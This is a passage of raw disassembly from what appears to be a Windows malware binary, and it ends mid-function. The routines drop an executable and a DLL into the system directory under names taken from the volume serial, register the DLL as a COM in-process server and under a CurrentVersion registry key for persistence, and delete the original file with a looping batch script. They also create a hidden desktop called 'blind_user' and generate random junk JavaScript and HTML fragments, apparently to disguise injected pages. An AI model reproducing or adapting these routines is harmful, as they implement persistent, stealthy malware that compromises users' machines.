; ---------------------------------------------------------------------------
loc_4025AD: ; CODE XREF: sub_402578+55�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
sub edx, eax
dec edx
mov al, [ebp+eax+var_35]
mov [edi+edx], al
add [ebp+var_1], 1
loc_4025C3: ; CODE XREF: sub_402578+33�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
cmp eax, edx
jl short loc_4025AD
movzx eax, [ebp+var_2]
mov byte ptr [edi+eax], 0
mov [ebp+var_3], 0
jmp short loc_4025EF
; ---------------------------------------------------------------------------
loc_4025DD: ; CODE XREF: sub_402578+88�j
push (offset aP0+4)
push edi
call sub_407E64
add esp, 8
add [ebp+var_3], 1
loc_4025EF: ; CODE XREF: sub_402578+63�j
movzx eax, [ebp+var_3]
mov edx, 20h
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jl short loc_4025DD
push [ebp+arg_8]
push edi
call sub_407E64
add esp, 8
pop edi
pop esi
pop ebx
leave
retn
sub_402578 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402613 proc near ; CODE XREF: sub_406344+37C�p
var_32 = byte ptr -32h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34h
push (offset aP0+2)
lea eax, [ebp+var_32]
push eax
push [ebp+arg_0]
call sub_402578
add esp, 0Ch
lea eax, [ebp+var_32]
push eax
call sub_4079F0 ; GlobalAddAtomA
leave
retn
sub_402613 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402638 proc near ; CODE XREF: sub_406344+3D5�p
; sub_406344+3E6�p
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 104h
push [ebp+arg_0]
lea eax, [ebp+var_104]
push eax
call sub_407E40
push offset aP0 ; "#P0"
lea eax, [ebp+var_104]
push eax
call sub_407E64
push [ebp+arg_4]
lea eax, [ebp+var_104]
push eax
call sub_407E64
add esp, 18h
lea eax, [ebp+var_104]
push eax
call sub_4079F0 ; GlobalAddAtomA
leave
retn
sub_402638 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 108h
push edi
push dword ptr [ebp+8]
lea eax, [ebp-104h]
push eax
call sub_407E40
push offset aP0 ; "#P0"
lea eax, [ebp-104h]
push eax
call sub_407E64
push dword ptr [ebp+0Ch]
lea eax, [ebp-104h]
push eax
call sub_407E64
add esp, 18h
loc_4026BD: ; CODE XREF: .text:004026E9�j
lea eax, [ebp-104h]
push eax
call sub_407A08 ; GlobalFindAtomA
mov edi, eax
mov [ebp-106h], di
cmp word ptr [ebp-106h], 0
jz short loc_4026EB
movzx eax, word ptr [ebp-106h]
push eax
call sub_4079FC ; GlobalDeleteAtom
jmp short loc_4026BD
; ---------------------------------------------------------------------------
loc_4026EB: ; CODE XREF: .text:004026DA�j
pop edi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4026EE proc near ; CODE XREF: sub_402784+11�p
; sub_40284A+F6�p ...
var_1008 = dword ptr -1008h
var_1003 = byte ptr -1003h
var_1000 = byte ptr -1000h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1008h
call sub_4078CC
push edi
mov edi, [ebp+arg_0]
push 0FFFh
lea eax, [ebp+var_1003]
push eax
call sub_40799C ; GetSystemDirectoryA
mov [ebp+var_1000], 0
push 0FFFh
lea eax, [ebp+var_1003]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_1008]
push eax
push 0FFFh
lea eax, [ebp+var_1003]
push eax
lea eax, [ebp+var_1003]
push eax
call sub_4079D8 ; GetVolumeInformationA
push [ebp+var_1008]
push offset a08x ; "%08X"
push edi
call sub_407E40
add esp, 0Ch
and [ebp+var_4], 0
loc_402762: ; CODE XREF: sub_4026EE+91�j
mov eax, [ebp+var_4]
mov al, [edi+eax]
cmp al, 41h
jge short loc_402778
cmp al, 30h
jle short loc_402778
mov eax, [ebp+var_4]
add eax, edi
add byte ptr [eax], 11h
loc_402778: ; CODE XREF: sub_4026EE+7C�j
; sub_4026EE+80�j
inc [ebp+var_4]
cmp [ebp+var_4], 8
jb short loc_402762
pop edi
leave
retn
sub_4026EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402784 proc near ; CODE XREF: sub_406344+437�p
var_26C = byte ptr -26Ch
var_267 = byte ptr -267h
var_163 = byte ptr -163h
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 26Ch
push edi
lea eax, [ebp+var_163]
push eax
call sub_4026EE
lea eax, [ebp+var_163]
push eax
push offset dword_419160
push offset aSS_exe ; "%s\\%s.exe"
lea eax, [ebp+var_FF]
push eax
call sub_407E40
lea eax, [ebp+var_FF]
push eax
call sub_4024E0
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_FF]
push eax
call sub_407A8C ; CreateFileA
mov edi, eax
push 0
lea eax, [ebp+var_26C]
push eax
push 3621h
push offset byte_41C9E1
push edi
call sub_407B40 ; WriteFile
push edi
call sub_407984 ; CloseHandle
push 104h
lea eax, [ebp+var_267]
push eax
push 0
call sub_40796C ; GetModuleFileNameA
push offset asc_424E5F ; " "
lea eax, [ebp+var_FF]
push eax
call sub_407E64
lea eax, [ebp+var_267]
push eax
lea eax, [ebp+var_FF]
push eax
call sub_407E64
add esp, 28h
push 0
lea eax, [ebp+var_FF]
push eax
call sub_407B34 ; WinExec
pop edi
leave
retn
sub_402784 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40284A proc near ; CODE XREF: sub_406344+1B1�p
var_2F0 = dword ptr -2F0h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = byte ptr -2D4h
var_2CD = byte ptr -2CDh
var_269 = byte ptr -269h
var_205 = byte ptr -205h
var_101 = byte ptr -101h
var_FB = byte ptr -0FBh
var_FA = byte ptr -0FAh
var_F9 = byte ptr -0F9h
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2F0h
push ebx
push esi
push edi
call sub_407E28
mov [ebp+var_2D8], eax
call sub_407E28
mov [ebp+var_2DC], eax
call sub_407E28
mov [ebp+var_2E0], eax
call sub_407E28
mov [ebp+var_2E4], eax
call sub_407E28
mov [ebp+var_2E8], eax
call sub_407E28
mov [ebp+var_2EC], eax
call sub_407E28
mov [ebp+var_2F0], eax
call sub_407E28
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_2F0]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_2EC]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_2E8]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_2E4]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_2E0]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_2DC]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_2D8]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
push offset a04x04x04x04x04 ; "{%04X%04X-%04X-%04X-%04X-%04X%04X%04X}"
lea edi, [ebp+var_269]
push edi
call sub_407E40
lea eax, [ebp+var_2CD]
push eax
call sub_4026EE
add esp, 2Ch
call sub_407E28
mov edx, 10624DD3h
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov edi, edx
add edi, 41h
mov ebx, edi
mov [ebp+var_101], bl
mov [ebp+var_1], 1
jmp short loc_40299B
; ---------------------------------------------------------------------------
loc_402971: ; CODE XREF: sub_40284A+156�j
call sub_407E28
movzx edi, [ebp+var_1]
mov edx, 10624DD3h
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov ebx, edx
add ebx, 61h
mov [ebp+edi+var_101], bl
add [ebp+var_1], 1
loc_40299B: ; CODE XREF: sub_40284A+125�j
mov al, [ebp+var_1]
cmp al, 8
jbe short loc_402971
mov [ebp+var_F9], 0
call sub_407E28
mov edx, eax
test dl, 1
jnz short loc_4029C3
mov [ebp+var_FB], 33h
mov [ebp+var_FA], 32h
loc_4029C3: ; CODE XREF: sub_40284A+169�j
lea eax, [ebp+var_101]
push eax
push offset dword_419160
push offset aSS_dll ; "%s\\%s.dll"
lea eax, [ebp+var_205]
push eax
call sub_407E40
lea eax, [ebp+var_205]
push eax
call sub_4024E0
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_205]
push eax
call sub_407A8C ; CreateFileA
mov esi, eax
push [ebp+arg_0]
mov eax, offset aAbcdefghijklmn ; "abcdefghijklmno"
push eax
call sub_407E40
push 0
lea eax, [ebp+var_2D4]
push eax
push 1A01h
push offset dword_41AFE0
push esi
call sub_407B40 ; WriteFile
push esi
call sub_407984 ; CloseHandle
lea eax, [ebp+var_269]
push eax
push offset aClsidSInprocse ; "CLSID\\%s\\InProcServer32"
lea eax, [ebp+var_101]
push eax
call sub_407E40
lea eax, [ebp+var_205]
push eax
push offset byte_424E15
lea eax, [ebp+var_101]
push eax
push 80000000h
call sub_402AAB
push offset aApartment ; "Apartment"
push offset aThreadingmodel ; "ThreadingModel"
lea eax, [ebp+var_101]
push eax
push 80000000h
call sub_402AAB
lea eax, [ebp+var_269]
push eax
lea eax, [ebp+var_2CD]
push eax
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_402AAB
add esp, 58h
pop edi
pop esi
pop ebx
leave
retn
sub_40284A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402AAB proc near ; CODE XREF: sub_40284A+21C�p
; sub_40284A+237�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov edi, [ebp+arg_C]
inc dword_41A1FC
and [ebp+var_4], 0
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_407D2C ; RegCreateKeyExA
mov ecx, edi
or eax, 0FFFFFFFFh
loc_402AE4: ; CODE XREF: sub_402AAB+3E�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_402AE4
mov [ebp+var_8], eax
push [ebp+var_8]
push edi
push 1
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_407D5C ; RegSetValueExA
push [ebp+var_4]
call sub_407D38 ; RegCloseKey
pop edi
pop esi
leave
retn
sub_402AAB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402B0D proc near ; CODE XREF: sub_406344+1EA�p
var_1494 = byte ptr -1494h
var_148F = byte ptr -148Fh
var_1390 = dword ptr -1390h
var_1380 = dword ptr -1380h
var_12FC = byte ptr -12FCh
var_11FD = byte ptr -11FDh
var_10FE = byte ptr -10FEh
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
mov eax, 1494h
call sub_4078CC
push ebx
push esi
push edi
push 0FFh
lea eax, [ebp+var_12FC]
push eax
push 0
call sub_40796C ; GetModuleFileNameA
mov [ebp+var_1390], 94h
lea eax, [ebp+var_1390]
push eax
call sub_4079CC ; GetVersionExA
cmp [ebp+var_1380], 2
jnz short loc_402BA6
push 0FFh
lea eax, [ebp+var_FF]
push eax
call sub_40799C ; GetSystemDirectoryA
lea eax, [ebp+var_FF]
push eax
push offset aSXslfdlnt_bat ; "%s\\xslfdlnt.bat"
lea eax, [ebp+var_11FD]
push eax
call sub_407E40
lea eax, [ebp+var_FF]
push eax
push offset aSCmd_pif ; "%s\\cmd.pif"
lea eax, [ebp+var_148F]
push eax
call sub_407E40
push offset aCmd_exe ; "\\cmd.exe"
lea eax, [ebp+var_FF]
push eax
call sub_407E64
add esp, 20h
jmp short loc_402BFB
; ---------------------------------------------------------------------------
loc_402BA6: ; CODE XREF: sub_402B0D+40�j
push 0FFh
lea eax, [ebp+var_FF]
push eax
call sub_4079E4 ; GetWindowsDirectoryA
lea eax, [ebp+var_FF]
push eax
push offset aSXslfdl9x_bat ; "%s\\xslfdl9x.bat"
lea eax, [ebp+var_11FD]
push eax
call sub_407E40
lea eax, [ebp+var_FF]
push eax
push offset aSCommand_pif ; "%s\\command.pif"
lea eax, [ebp+var_148F]
push eax
call sub_407E40
push offset aCommand_com ; "\\command.com"
lea eax, [ebp+var_FF]
push eax
call sub_407E64
add esp, 20h
loc_402BFB: ; CODE XREF: sub_402B0D+97�j
lea eax, [ebp+var_148F]
push eax
call sub_407B70 ; DeleteFileA
push 0
push 80h
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_11FD]
push eax
call sub_407A8C ; CreateFileA
mov edi, eax
lea eax, [ebp+var_11FD]
push eax
lea eax, [ebp+var_12FC]
push eax
lea eax, [ebp+var_12FC]
push eax
push offset aLoop@delSNul@i ; ":loop\r\n@del %s>nul\r\n@if exist %s goto l"...
lea eax, [ebp+var_10FE]
push eax
call sub_407E40
add esp, 14h
lea ecx, [ebp+var_10FE]
or eax, 0FFFFFFFFh
loc_402C59: ; CODE XREF: sub_402B0D+151�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_402C59
push 0
lea ebx, [ebp+var_1494]
push ebx
push eax
lea esi, [ebp+var_10FE]
push esi
push edi
call sub_407B40 ; WriteFile
push edi
call sub_407984 ; CloseHandle
lea eax, [ebp+var_11FD]
push eax
lea eax, [ebp+var_FF]
push eax
push offset aSCS ; "%s /C %s"
lea eax, [ebp+var_10FE]
push eax
call sub_407E40
add esp, 10h
push 0
lea eax, [ebp+var_10FE]
push eax
call sub_407B34 ; WinExec
pop edi
pop esi
pop ebx
leave
retn
sub_402B0D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402CB2 proc near ; CODE XREF: sub_403D8E+124�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push esi
push edi
cmp dword_420004, 0
jz short loc_402CDE
call sub_407948 ; GetCurrentThreadId
push eax
call sub_407C48 ; GetThreadDesktop
mov [ebp+var_4], eax
mov eax, dword_420004
cmp [ebp+var_4], eax
jnz short loc_402D02
xor eax, eax
inc eax
jmp short loc_402D0F
; ---------------------------------------------------------------------------
loc_402CDE: ; CODE XREF: sub_402CB2+D�j
push 0
push 0C7h
push 0
push 0
push 0
push offset aBlind_user ; "blind_user"
call sub_407C30 ; CreateDesktopA
mov dword_420004, eax
or eax, eax
jnz short loc_402D02
xor eax, eax
jmp short loc_402D0F
; ---------------------------------------------------------------------------
loc_402D02: ; CODE XREF: sub_402CB2+25�j
; sub_402CB2+4A�j
push dword_420004
call sub_407C3C ; SetThreadDesktop
mov edi, eax
loc_402D0F: ; CODE XREF: sub_402CB2+2A�j
; sub_402CB2+4E�j
pop edi
pop esi
leave
retn
sub_402CB2 endp
; =============== S U B R O U T I N E =======================================
sub_402D13 proc near ; CODE XREF: sub_403D8E+17F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
lea edx, aBlind_user ; "blind_user"
mov [eax+8], edx
retn
sub_402D13 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402D21 proc near ; CODE XREF: sub_403659+3FD�p
; sub_403659+462�p ...
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10Ch
push esi
push edi
mov esi, [ebp+arg_0]
push [ebp+arg_4]
push esi
call sub_407E64
add esp, 8
call sub_407E28
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_402DDB
mov [ebp+var_FF], 0
push offset asc_424D14 ; "/* "
push esi
call sub_407E64
add esp, 8
mov [ebp+var_100], 0
jmp short loc_402DB6
; ---------------------------------------------------------------------------
loc_402D6F: ; CODE XREF: sub_402D21+9D�j
call sub_407E28
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_402DAF
call sub_407E28
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp+var_FF]
push edi
push offset aSC ; "%s%c"
lea edi, [ebp+var_FF]
push edi
call sub_407E40
add esp, 10h
loc_402DAF: ; CODE XREF: sub_402D21+5E�j
add [ebp+var_100], 1
loc_402DB6: ; CODE XREF: sub_402D21+4C�j
mov al, [ebp+var_100]
cmp al, 0Ah
jb short loc_402D6F
lea eax, [ebp+var_FF]
push eax
push esi
call sub_407E64
push offset asc_424D0B ; " */"
push esi
call sub_407E64
add esp, 10h
loc_402DDB: ; CODE XREF: sub_402D21+2A�j
call sub_407E28
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_402E83
call sub_407E28
mov [ebp+var_104], eax
call sub_407E28
mov [ebp+var_108], eax
call sub_407E28
mov [ebp+var_10C], eax
call sub_407E28
mov ecx, 0EA60h
cdq
idiv ecx
push edx
mov edi, [ebp+var_10C]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_108]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_104]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
push offset aVarCCCU ; "var %c%c%c = %u;"
lea edi, [ebp+var_FF]
push edi
call sub_407E40
lea eax, [ebp+var_FF]
push eax
push esi
call sub_407E64
add esp, 20h
loc_402E83: ; CODE XREF: sub_402D21+CA�j
call sub_407E28
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_402F0B
call sub_407E28
mov [ebp+var_104], eax
call sub_407E28
mov [ebp+var_108], eax
call sub_407E28
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_108]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_104]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
push offset aCCC ; "//%c%c%c\r\n"
lea edi, [ebp+var_FF]
push edi
call sub_407E40
lea eax, [ebp+var_FF]
push eax
push esi
call sub_407E64
add esp, 1Ch
loc_402F0B: ; CODE XREF: sub_402D21+172�j
call sub_407E28
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_402F2B
push offset asc_424CEC ; "\r\n"
push esi
call sub_407E64
add esp, 8
loc_402F2B: ; CODE XREF: sub_402D21+1FA�j
pop edi
pop esi
leave
retn
sub_402D21 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402F2F proc near ; CODE XREF: sub_403659+EC�p
; sub_403659+FA�p ...
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 100h
push esi
push edi
mov esi, [ebp+arg_0]
push [ebp+arg_4]
push esi
call sub_407E64
add esp, 8
call sub_407E28
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_403070
mov [ebp+var_FF], 0
push offset asc_424CE6 ; "<!-- "
push esi
call sub_407E64
add esp, 8
mov [ebp+var_100], 0
jmp loc_403047
sub_402F2F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_403010
loc_402F80: ; CODE XREF: sub_403010+3F�j
call sub_407E28
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_402FC0
call sub_407E28
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp-0FFh]
push edi
push offset aSC ; "%s%c"
lea edi, [ebp-0FFh]
push edi
call sub_407E40
add esp, 10h
loc_402FC0: ; CODE XREF: sub_403010-80�j
call sub_407E28
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_403000
call sub_407E28
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 41h
push edi
lea edi, [ebp-0FFh]
push edi
push offset aSC ; "%s%c"
lea edi, [ebp-0FFh]
push edi
call sub_407E40
add esp, 10h
loc_403000: ; CODE XREF: sub_403010-40�j
; DATA XREF: .data:loc_41E216�r ...
call sub_407E28
mov ecx, 0Ah ; DATA XREF: .data:0041D2CC�r
; .data:0041D39A�w ...
cdq
idiv ecx
cmp edx, 7
; END OF FUNCTION CHUNK FOR sub_403010
; =============== S U B R O U T I N E =======================================
sub_403010 proc near ; DATA XREF: .data:0041D36D�o
; sub_41E239+10�o
; FUNCTION CHUNK AT 00402F80 SIZE 00000090 BYTES
jge short loc_403040
call sub_407E28
mov ecx, 9
cdq
idiv ecx
mov edi, edx
add edi, 30h
push edi
lea edi, [ebp-0FFh]
push edi
push offset aSC ; "%s%c"
lea edi, [ebp-0FFh]
push edi
call sub_407E40
add esp, 10h
loc_403040: ; CODE XREF: sub_403010�j
add byte ptr [ebp-100h], 1
loc_403047: ; CODE XREF: sub_402F2F+4C�j
mov al, [ebp-100h]
cmp al, 0Ah
jb loc_402F80
lea eax, [ebp-0FFh]
push eax
push esi
call sub_407E64
push offset asc_424CE1 ; "--> "
push esi
call sub_407E64
add esp, 10h
loc_403070: ; CODE XREF: sub_402F2F+2A�j
call sub_407E28
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_40317E
mov byte ptr [ebp-0FFh], 0
mov byte ptr [ebp-100h], 0
jmp loc_403160
; ---------------------------------------------------------------------------
loc_403099: ; CODE XREF: sub_403010+158�j
call sub_407E28
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 4
jge short loc_4030D9
call sub_407E28
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp-0FFh]
push edi
push offset aSC ; "%s%c"
lea edi, [ebp-0FFh]
push edi
call sub_407E40
add esp, 10h
loc_4030D9: ; CODE XREF: sub_403010+99�j
call sub_407E28
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 4
jge short loc_403119
call sub_407E28
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 41h
push edi
lea edi, [ebp-0FFh]
push edi
push offset aSC ; "%s%c"
lea edi, [ebp-0FFh]
push edi
call sub_407E40
add esp, 10h
loc_403119: ; CODE XREF: sub_403010+D9�j
call sub_407E28
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 3
jge short loc_403159
call sub_407E28
mov ecx, 9
cdq
idiv ecx
mov edi, edx
add edi, 30h
push edi
lea edi, [ebp-0FFh]
push edi
push offset aSC ; "%s%c"
lea edi, [ebp-0FFh]
push edi
call sub_407E40
add esp, 10h
loc_403159: ; CODE XREF: sub_403010+119�j
add byte ptr [ebp-100h], 1
loc_403160: ; CODE XREF: sub_403010+84�j
mov al, [ebp-100h]
cmp al, 32h
jb loc_403099
lea eax, [ebp-0FFh]
push eax
push esi
call sub_407E64
add esp, 8
loc_40317E: ; CODE XREF: sub_403010+70�j
call sub_407E28
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_40319E
push offset aBr ; "<br>"
push esi
call sub_407E64
add esp, 8
loc_40319E: ; CODE XREF: sub_403010+17E�j
call sub_407E28
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_4031BE
push offset aB_1 ; "<b>"
push esi
call sub_407E64
add esp, 8
loc_4031BE: ; CODE XREF: sub_403010+19E�j
call sub_407E28
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_4031DE
push offset aU_0 ; "<u>"
push esi
call sub_407E64
add esp, 8
loc_4031DE: ; CODE XREF: sub_403010+1BE�j
call sub_407E28
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_4031FE
push offset aI_0 ; "<i>"
push esi
call sub_407E64
add esp, 8
loc_4031FE: ; CODE XREF: sub_403010+1DE�j
call sub_407E28
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_40321E
push offset aI ; "</i>"
push esi
call sub_407E64
add esp, 8
loc_40321E: ; CODE XREF: sub_403010+1FE�j
call sub_407E28
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_40323E
push offset aB ; "</b>"
push esi
call sub_407E64
add esp, 8
loc_40323E: ; CODE XREF: sub_403010+21E�j
call sub_407E28
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_40325E
push offset aU ; "</u>"
push esi
call sub_407E64
add esp, 8
loc_40325E: ; CODE XREF: sub_403010+23E�j
call sub_407E28
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_40327E
push offset aFont ; "</font>"
push esi
call sub_407E64
add esp, 8
loc_40327E: ; CODE XREF: sub_403010+25E�j
call sub_407E28
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_40329E
push offset aCenter ; "<center>"
push esi
call sub_407E64
add esp, 8
loc_40329E: ; CODE XREF: sub_403010+27E�j
call sub_407E28
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_4032BE
push offset aCenter_0 ; "</center>"
push esi
call sub_407E64
add esp, 8
loc_4032BE: ; CODE XREF: sub_403010+29E�j
call sub_407E28
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_4032DE
push offset asc_424CEC ; "\r\n"
push esi
call sub_407E64
add esp, 8
loc_4032DE: ; CODE XREF: sub_403010+2BE�j
pop edi
pop esi
leave
retn
sub_403010 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4032E2 proc near ; CODE XREF: sub_4033E8+58�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
xor edi, edi
inc edi
push [ebp+arg_0]
call sub_407D8C ; GetSidIdentifierAuthority
mov esi, eax
push [ebp+arg_0]
call sub_407DA4 ; GetSidSubAuthorityCount
movzx edx, byte ptr [eax]
mov [ebp+var_8], edx
mov eax, 0Ch
mul [ebp+var_8]
mov [ebp+var_C], eax
add eax, 1Ch
mov [ebp+var_4], eax
push edi
push offset aSLu ; "S-%lu-"
push [ebp+arg_4]
call sub_407C78 ; wsprintfA
add esp, 0Ch
mov [ebp+var_4], eax
mov ebx, eax
add ebx, [ebp+arg_4]
cmp byte ptr [esi], 0
jnz short loc_40333B
cmp byte ptr [esi+1], 0
jz short loc_403382
loc_40333B: ; CODE XREF: sub_4032E2+51�j
movzx eax, byte ptr [esi+5]
movzx eax, ax
push eax
movzx eax, byte ptr [esi+4]
movzx eax, ax
push eax
movzx eax, byte ptr [esi+3]
movzx eax, ax
push eax
movzx eax, byte ptr [esi+2]
movzx eax, ax
push eax
movzx eax, byte ptr [esi+1]
movzx eax, ax
push eax
movzx eax, byte ptr [esi]
movzx eax, ax
push eax
push offset a0x02hx02hx02hx ; "0x%02hx%02hx%02hx%02hx%02hx%02hx"
push ebx
call sub_407C78 ; wsprintfA
add esp, 20h
mov edi, eax
add [ebp+var_4], edi
lea ebx, [ebx+edi]
jmp short loc_4033B8
; ---------------------------------------------------------------------------
loc_403382: ; CODE XREF: sub_4032E2+57�j
movzx edx, byte ptr [esi+5]
movzx ecx, byte ptr [esi+4]
shl ecx, 8
add edx, ecx
movzx ecx, byte ptr [esi+3]
shl ecx, 10h
add edx, ecx
movzx ecx, byte ptr [esi+2]
shl ecx, 18h
add edx, ecx
push edx
push offset aLu_0 ; "%lu"
push ebx
call sub_407C78 ; wsprintfA
add esp, 0Ch
mov edi, eax
add [ebp+var_4], edi
lea ebx, [ebx+edi]
loc_4033B8: ; CODE XREF: sub_4032E2+9E�j
xor esi, esi
jmp short loc_4033DE
; ---------------------------------------------------------------------------
loc_4033BC: ; CODE XREF: sub_4032E2+FF�j
push esi
push [ebp+arg_0]
call sub_407D98 ; GetSidSubAuthority
push dword ptr [eax]
push offset aLu ; "-%lu"
push ebx
call sub_407C78 ; wsprintfA
add esp, 0Ch
mov edi, eax
add [ebp+var_4], edi
lea ebx, [ebx+edi]
inc esi
loc_4033DE: ; CODE XREF: sub_4032E2+D8�j
cmp esi, [ebp+var_8]
jb short loc_4033BC
pop edi
pop esi
pop ebx
leave
retn
sub_4032E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4033E8 proc near ; CODE XREF: sub_403BC5+123�p
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push eax
push edi
call sub_40793C ; GetCurrentProcessId
mov edi, eax
push edi
push 0
push 1F0FFFh
call sub_407A80 ; OpenProcess
mov edi, eax
lea eax, [ebp+var_4]
push eax
push 0F00FFh
push edi
call sub_407D14 ; OpenProcessToken
push edi
call sub_407984 ; CloseHandle
push 4000h
push 40h
call sub_407A5C ; LocalAlloc
mov edi, eax
lea eax, [ebp+var_8]
push eax
push 4000h
push edi
push 1
push [ebp+var_4]
